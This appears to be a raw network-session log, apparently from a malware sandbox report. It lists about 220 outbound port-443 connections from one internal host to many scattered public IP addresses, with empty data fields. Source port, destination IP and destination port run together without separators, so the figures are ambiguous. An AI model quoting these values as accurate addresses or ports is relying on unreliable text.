                                        17712192.168.2.13427769.63.224.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17713192.168.2.1350222166.254.89.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17714192.168.2.1338604186.54.12.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17715192.168.2.1344354219.13.170.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17716192.168.2.133606497.65.122.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17717192.168.2.1348756209.95.243.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17718192.168.2.1359992117.236.182.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17719192.168.2.1346450186.100.130.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17720192.168.2.1353864194.82.12.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17721192.168.2.133954813.31.91.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17722192.168.2.1353568122.85.5.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17723192.168.2.133796077.155.214.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17724192.168.2.1350946194.25.204.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17725192.168.2.1345846156.254.17.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17726192.168.2.134920470.248.12.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17727192.168.2.1359970134.105.6.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17728192.168.2.1336144111.32.110.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17729192.168.2.1356094102.27.184.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17730192.168.2.1342976193.52.127.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17731192.168.2.1338710104.142.85.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17732192.168.2.1358248149.245.26.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17733192.168.2.1335574148.12.141.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17734192.168.2.134578444.167.22.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17735192.168.2.1351062180.49.48.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17736192.168.2.13569945.47.61.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17737192.168.2.1337706100.178.214.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17738192.168.2.1359908201.7.95.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17739192.168.2.1353072185.130.218.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17740192.168.2.133823246.116.185.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17741192.168.2.1332812195.100.221.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17742192.168.2.1354818105.173.25.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17743192.168.2.1344982197.121.117.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17744192.168.2.134545837.85.189.90443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17745192.168.2.134123478.240.216.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17746192.168.2.134529896.70.210.163443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17747192.168.2.135354247.64.243.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17748192.168.2.1337984119.88.195.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17749192.168.2.135231212.214.56.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17750192.168.2.134141619.57.209.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17751192.168.2.133762869.117.45.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17752192.168.2.133894080.33.239.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17753192.168.2.1358906147.255.61.63443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17754192.168.2.1338114218.136.248.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17755192.168.2.1348704211.223.35.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17756192.168.2.1358170141.234.96.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17757192.168.2.135563871.2.139.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17758192.168.2.1344046169.174.233.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17759192.168.2.1344096159.84.136.209443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17760192.168.2.1355226181.218.145.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17761192.168.2.135950087.103.174.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17762192.168.2.1333550126.49.161.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17763192.168.2.1346820179.12.230.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17764192.168.2.1347604121.116.80.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17765192.168.2.1359524141.108.171.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17766192.168.2.134391234.59.189.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17767192.168.2.134933235.14.218.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17768192.168.2.1345750102.26.53.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17769192.168.2.1356040219.6.125.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17770192.168.2.1356336220.119.185.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17771192.168.2.135726020.12.54.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17772192.168.2.1355726142.110.0.243443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17773192.168.2.1334184184.62.178.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17774192.168.2.1334410155.110.95.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17775192.168.2.1332950176.79.121.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17776192.168.2.1336540212.43.210.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17777192.168.2.135318450.84.77.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17778192.168.2.1360470106.24.77.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17779192.168.2.1343790211.234.8.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17780192.168.2.1347310123.35.129.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17781192.168.2.133610014.40.125.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17782192.168.2.1337774110.229.72.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17783192.168.2.1354890211.115.222.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17784192.168.2.1353958122.169.180.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17785192.168.2.135043087.94.167.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17786192.168.2.1353486148.71.15.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17787192.168.2.1349310141.65.68.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17788192.168.2.1349624167.34.35.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17789192.168.2.1354718103.141.201.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17790192.168.2.1334044122.200.102.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17791192.168.2.1349726150.70.214.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17792192.168.2.1342010126.5.16.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17793192.168.2.1344262116.97.139.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17794192.168.2.133875469.23.28.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17795192.168.2.1344716186.147.53.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17796192.168.2.1354784120.156.100.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17797192.168.2.134220681.177.244.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17798192.168.2.133945074.51.132.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17799192.168.2.1356468197.173.198.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17800192.168.2.133795020.33.126.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17801192.168.2.1338966204.245.109.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17802192.168.2.1354578179.111.254.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17803192.168.2.135871288.185.51.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17804192.168.2.1352392223.102.250.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17805192.168.2.135635442.63.138.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17806192.168.2.1344992217.156.119.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17807192.168.2.1357944221.6.74.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17808192.168.2.133297884.69.138.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17809192.168.2.1343252174.74.192.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17810192.168.2.1339326175.74.32.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17811192.168.2.1350244148.167.8.10443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17812192.168.2.1351930140.42.218.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17813192.168.2.1360668154.188.246.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17814192.168.2.1353648156.144.218.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17815192.168.2.1360380140.104.144.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17816192.168.2.1354362174.66.38.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17817192.168.2.134063291.36.31.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17818192.168.2.1339344185.124.96.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17819192.168.2.1350572206.177.130.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17820192.168.2.1357636170.113.218.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17821192.168.2.135187887.77.166.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17822192.168.2.1344300158.179.185.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17823192.168.2.134516478.152.55.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17824192.168.2.13384605.187.41.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17825192.168.2.1360116171.144.60.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17826192.168.2.1345434181.166.163.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17827192.168.2.1340162187.23.94.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17828192.168.2.135331818.39.109.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17829192.168.2.1355754124.40.139.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17830192.168.2.1351648208.52.95.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17831192.168.2.133551254.109.0.220443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17832192.168.2.1343120164.110.37.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17833192.168.2.135932645.243.218.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17834192.168.2.1347746189.71.78.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17835192.168.2.1336998155.203.32.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17836192.168.2.1341676188.238.37.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17837192.168.2.134266624.0.46.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17838192.168.2.133535466.55.101.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17839192.168.2.1349924160.25.197.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17840192.168.2.1360824109.131.14.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17841192.168.2.1340378208.229.90.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17842192.168.2.1348172195.7.158.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17843192.168.2.1355024140.200.82.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17844192.168.2.134865432.129.41.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17845192.168.2.133919874.29.186.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17846192.168.2.135144296.48.63.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17847192.168.2.1345898196.34.137.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17848192.168.2.134169877.62.179.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17849192.168.2.1359780112.35.48.180443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17850192.168.2.1348706156.247.163.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17851192.168.2.1333136177.121.211.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17852192.168.2.134221620.39.92.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17853192.168.2.1351494173.160.20.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17854192.168.2.134741479.76.58.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17855192.168.2.1349174181.231.57.148443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17856192.168.2.1344158113.211.25.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17857192.168.2.1347138101.143.43.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17858192.168.2.135267217.221.174.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17859192.168.2.1333642219.122.87.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17860192.168.2.1343450183.34.101.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17861192.168.2.1351956119.145.216.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17862192.168.2.135344636.112.123.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17863192.168.2.1360462220.121.158.224443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17864192.168.2.135138225.97.224.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17865192.168.2.136097092.15.130.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17866192.168.2.133620697.202.170.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17867192.168.2.1345060220.17.92.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17868192.168.2.1341128137.20.144.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17869192.168.2.1336710161.234.206.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17870192.168.2.1339734168.85.79.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17871192.168.2.1351728118.164.230.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17872192.168.2.135369495.122.64.216443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17873192.168.2.135347250.153.244.104443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17874192.168.2.134986069.68.157.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17875192.168.2.134722048.226.244.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17876192.168.2.1360352133.67.244.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17877192.168.2.133744667.254.23.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17878192.168.2.1335222113.226.195.210443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17879192.168.2.1339438197.97.84.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17880192.168.2.1339716129.150.255.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17881192.168.2.1337568181.60.167.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17882192.168.2.135803247.35.7.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17883192.168.2.1345024100.132.0.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17884192.168.2.135124632.73.86.241443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17885192.168.2.1335716102.176.72.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17886192.168.2.1357036128.241.22.189443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17887192.168.2.1336628216.104.79.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17888192.168.2.133626085.37.255.127443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17889192.168.2.1353780104.155.249.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17890192.168.2.1338190123.166.138.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17891192.168.2.1341178168.41.238.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17892192.168.2.13402165.29.50.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17893192.168.2.1358802206.49.32.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17894192.168.2.135126691.46.149.19443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17895192.168.2.1351412110.214.131.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17896192.168.2.135220685.196.152.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17897192.168.2.1345672118.215.12.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17898192.168.2.134540034.22.147.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17899192.168.2.1337196103.125.74.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17900192.168.2.133900893.59.66.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17901192.168.2.1333458200.150.228.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17902192.168.2.1355874171.19.202.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17903192.168.2.1357400165.252.86.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17904192.168.2.1345460130.43.204.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17905192.168.2.1346838154.129.171.228443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17906192.168.2.1356194151.112.124.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17907192.168.2.134174865.87.159.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17908192.168.2.1347740141.138.246.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17909192.168.2.1333022146.189.59.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17910192.168.2.134794480.195.135.125443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17911192.168.2.135081873.143.73.43443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17912192.168.2.1352062128.248.120.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17913192.168.2.135147018.0.214.87443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17914192.168.2.1343634209.190.47.102443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17915192.168.2.1334840171.120.47.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17916192.168.2.134238269.179.82.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17917192.168.2.1349608119.208.68.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17918192.168.2.135040298.230.98.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17919192.168.2.1360166140.135.72.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17920192.168.2.1340072119.121.20.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17921192.168.2.1347386156.125.204.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17922192.168.2.134316817.192.130.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17923192.168.2.134696481.76.167.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17924192.168.2.1335786143.255.42.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17925192.168.2.134020239.142.52.118443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17926192.168.2.1359824179.192.249.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17927192.168.2.134509251.91.212.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17928192.168.2.1336910201.1.208.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17929192.168.2.1353074222.85.57.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17930192.168.2.1354730172.106.27.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17931192.168.2.1360104204.113.160.111443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17932192.168.2.1345516174.213.8.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17933192.168.2.1338946170.44.26.59443
                                        TimestampBytes transferredDirectionData


